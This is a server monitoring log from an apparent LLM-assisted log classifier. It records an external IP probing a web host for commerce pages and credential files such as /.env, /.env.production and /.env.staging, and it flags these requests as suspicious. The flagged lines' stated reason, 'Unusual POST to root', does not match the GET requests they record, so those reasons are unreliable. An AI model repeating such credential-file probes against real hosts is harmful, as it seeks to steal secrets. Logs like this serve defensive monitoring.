Mar 20 15:01:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:01:31.937658 [observer] Patterns: hash=6222 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:02:01.969478 [observer] Pipeline: processed=6664 pattern_hits=6240 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:02:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:02:01.969512 [observer] Patterns: hash=6226 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:02:31.939683 [observer] Pipeline: processed=6666 pattern_hits=6242 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:02:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:02:31.939716 [observer] Patterns: hash=6228 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:03:01.958076 [observer] Pipeline: processed=6670 pattern_hits=6246 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:03:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:03:01.958109 [observer] Patterns: hash=6232 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:03:31.937520 [observer] Pipeline: processed=6674 pattern_hits=6250 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:03:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:03:31.937545 [observer] Patterns: hash=6236 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:04:01.945436 [observer] Pipeline: processed=6677 pattern_hits=6253 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:04:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:04:01.945494 [observer] Patterns: hash=6239 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:04:31.938376 [observer] Pipeline: processed=6680 pattern_hits=6256 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:04:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:04:31.938406 [observer] Patterns: hash=6242 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:05:01.976594 [observer] Pipeline: processed=6682 pattern_hits=6258 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:05:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:05:01.976756 [observer] Patterns: hash=6244 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:05:31.938555 [observer] Pipeline: processed=6686 pattern_hits=6262 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:05:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:05:31.938581 [observer] Patterns: hash=6248 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:06:01.966195 [observer] Pipeline: processed=6688 pattern_hits=6264 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:06:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:06:01.967969 [observer] Patterns: hash=6250 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:06:31.938181 [observer] Pipeline: processed=6692 pattern_hits=6268 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:06:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:06:31.938216 [observer] Patterns: hash=6254 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:07:01.956392 [observer] Pipeline: processed=6694 pattern_hits=6270 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:07:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:07:01.956426 [observer] Patterns: hash=6256 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:07:31.937652 [observer] Pipeline: processed=6697 pattern_hits=6273 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:07:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:07:31.937680 [observer] Patterns: hash=6259 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:08:02.005832 [observer] Pipeline: processed=6700 pattern_hits=6276 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:08:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:08:02.005869 [observer] Patterns: hash=6262 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:08:31.953379 [observer] Pipeline: processed=6702 pattern_hits=6278 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:08:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:08:31.953407 [observer] Patterns: hash=6264 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:09:01.987644 [observer] Pipeline: processed=6708 pattern_hits=6284 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:09:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:09:01.987767 [observer] Patterns: hash=6270 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:09:31.949676 [observer] Pipeline: processed=6710 pattern_hits=6286 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:09:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:09:31.949707 [observer] Patterns: hash=6272 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:01.953860 [observer] Pipeline: processed=6714 pattern_hits=6290 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:10:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:01.953889 [observer] Patterns: hash=6276 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:31.948634 [observer] Pipeline: processed=6716 pattern_hits=6292 llm_calls=424 llm_errors=3 learned=5
Mar 20 15:10:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:31.948668 [observer] Patterns: hash=6278 prefix=14 regex=0 contains=0 deny=127 alert=600 suppress=0 misses=424
Mar 20 15:10:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:34.332081 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:34.331723233Z 185.177.72.50 - - [20/Mar/2026:15:10:34 +0000] "captain.admin.kovicloud.com" "GET /plans HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 15:10:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:34.362558 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:34.362236677Z 185.177.72.50 - - [20/Mar/2026:15:10:34 +0000] "captain.admin.kovicloud.com" "GET /pricing HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:10:34 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:34.681439 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:34.680841123Z 185.177.72.50 - - [20/Mar/2026:15:10:34 +0000] "captain.admin.kovicloud.com" "GET /payment HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:10:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:35.291630 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:35.291324081Z 185.177.72.50 - - [20/Mar/2026:15:10:35 +0000] "captain.admin.kovicloud.com" "GET /cart HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 15:10:35 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:35.518789 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:35.518409157Z 185.177.72.50 - - [20/Mar/2026:15:10:35 +0000] "captain.admin.kovicloud.com" "GET /order HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 15:10:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:36.089803 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:36.089362655Z 185.177.72.50 - - [20/Mar/2026:15:10:36 +0000] "captain.admin.kovicloud.com" "GET /register HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:10:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:36.122340 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:36.121974045Z 185.177.72.50 - - [20/Mar/2026:15:10:36 +0000] "captain.admin.kovicloud.com" "GET /sitemap.xml HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit...
Mar 20 15:10:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:36.360071 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:36.359745608Z 185.177.72.50 - - [20/Mar/2026:15:10:36 +0000] "captain.admin.kovicloud.com" "GET /billing HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:10:36 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:36.583631 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:36.583436133Z 185.177.72.50 - - [20/Mar/2026:15:10:36 +0000] "captain.admin.kovicloud.com" "GET /checkout HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:10:37 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:37.203564 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:10:37.203262209Z 185.177.72.50 - - [20/Mar/2026:15:10:37 +0000] "captain.admin.kovicloud.com" "GET /shop HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 15:10:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:43.544706 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.65 action=allow pattern_type=prefix
Mar 20 15:10:43 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:43.544743 [analyzer] Source hint mismatch: LLM says "nginx/http-server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:10:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:48.928688 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:10:48 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:48.928721 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=HTTP 404 on /pricing could indicate broken links or probing; not necessarily malicious but merits attention due to error rate Line=2026-03-20T15:10:34.362231632Z GET /pricing 404 0.733 ms - 9
Mar 20 15:10:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:56.662602 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:10:56 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:10:56.662642 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:01.963128 [observer] Pipeline: processed=6734 pattern_hits=6306 llm_calls=428 llm_errors=3 learned=5
Mar 20 15:11:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:01.963212 [observer] Patterns: hash=6292 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=428
Mar 20 15:11:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:02.951049 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix
Mar 20 15:11:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:02.951092 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:08.527196 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:11:08 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:08.527229 [analyzer] Source hint mismatch: LLM says "webserver", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:12.290526 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=suspicious confidence=0.65 action=alert pattern_type=
Mar 20 15:11:12 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:12.290561 [SUSPICIOUS] Source=docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto Reason=Single 404 response to a /register request could indicate probing or misconfiguration; not definitive malicious activity but warrants monitoring. Line=2026-03-20T15:10:36.089591154Z GET /register 404 0.572 ms - 9
Mar 20 15:11:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:15.361780 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.85 action=allow pattern_type=prefix
Mar 20 15:11:15 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:15.361819 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:18.072833 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.92 action=allow pattern_type=prefix
Mar 20 15:11:18 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:18.072870 [analyzer] Source hint mismatch: LLM says "nginx_access", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:22.949085 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:11:22 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:22.949125 [analyzer] Source hint mismatch: LLM says "nginx_access_log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:27.302980 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:11:27 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:27.303020 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:31.942209 [observer] Pipeline: processed=6744 pattern_hits=6309 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:11:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:31.942240 [observer] Patterns: hash=6295 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:11:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:32.969674 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 20 15:11:32 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:11:32.969720 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 20 15:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:12:01.964139 [observer] Pipeline: processed=6746 pattern_hits=6311 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:12:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:12:01.964185 [observer] Patterns: hash=6297 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:12:31.940781 [observer] Pipeline: processed=6750 pattern_hits=6315 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:12:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:12:31.940810 [observer] Patterns: hash=6301 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:13:01.985867 [observer] Pipeline: processed=6752 pattern_hits=6317 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:13:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:13:01.985898 [observer] Patterns: hash=6303 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:13:31.936601 [observer] Pipeline: processed=6756 pattern_hits=6321 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:13:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:13:31.936629 [observer] Patterns: hash=6307 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:14:01.957222 [observer] Pipeline: processed=6760 pattern_hits=6325 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:14:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:14:01.957265 [observer] Patterns: hash=6311 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:14:31.939469 [observer] Pipeline: processed=6763 pattern_hits=6328 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:14:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:14:31.939497 [observer] Patterns: hash=6314 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:01.968327 [observer] Pipeline: processed=6766 pattern_hits=6331 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:15:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:01.968516 [observer] Patterns: hash=6317 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:31.947626 [observer] Pipeline: processed=6768 pattern_hits=6333 llm_calls=435 llm_errors=3 learned=5
Mar 20 15:15:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:31.947655 [observer] Patterns: hash=6319 prefix=14 regex=0 contains=0 deny=127 alert=610 suppress=0 misses=435
Mar 20 15:15:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:58.881998 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:58.881403708Z 185.177.72.60 - - [20/Mar/2026:15:15:58 +0000] "captain.admin.kovicloud.com" "GET /pricing HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537...
Mar 20 15:15:58 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:58.891576 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:58.891354395Z 185.177.72.60 - - [20/Mar/2026:15:15:58 +0000] "captain.admin.kovicloud.com" "GET /.env HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.052222 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.051868353Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /cart HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.118256 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.118035046Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /donate HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537....
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.131303 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.131095092Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.production HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWe...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.343103 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.342632164Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.production.local HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) A...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.354707 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.354476495Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.prod HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.548582 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.548332880Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.staging HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKi...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.559945 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.559724762Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.stage HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.588594 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.588285026Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /admin HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.3...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.591620 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.591392791Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /register HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.624668 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.624312033Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /dashboard HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.691890 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.691562637Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /subscribe HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/5...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.772193 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.771934733Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.dev HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/53...
Mar 20 15:15:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 15:15:59.780484 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Unusual POST to root (/) returning 404 from external IP may indicate probing or misconfiguration. Line=2026-03-20T15:15:59.780119353Z 185.177.72.60 - - [20/Mar/2026:15:15:59 +0000] "captain.admin.kovicloud.com" "GET /.env.development HTTP/1.1" 404 9 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
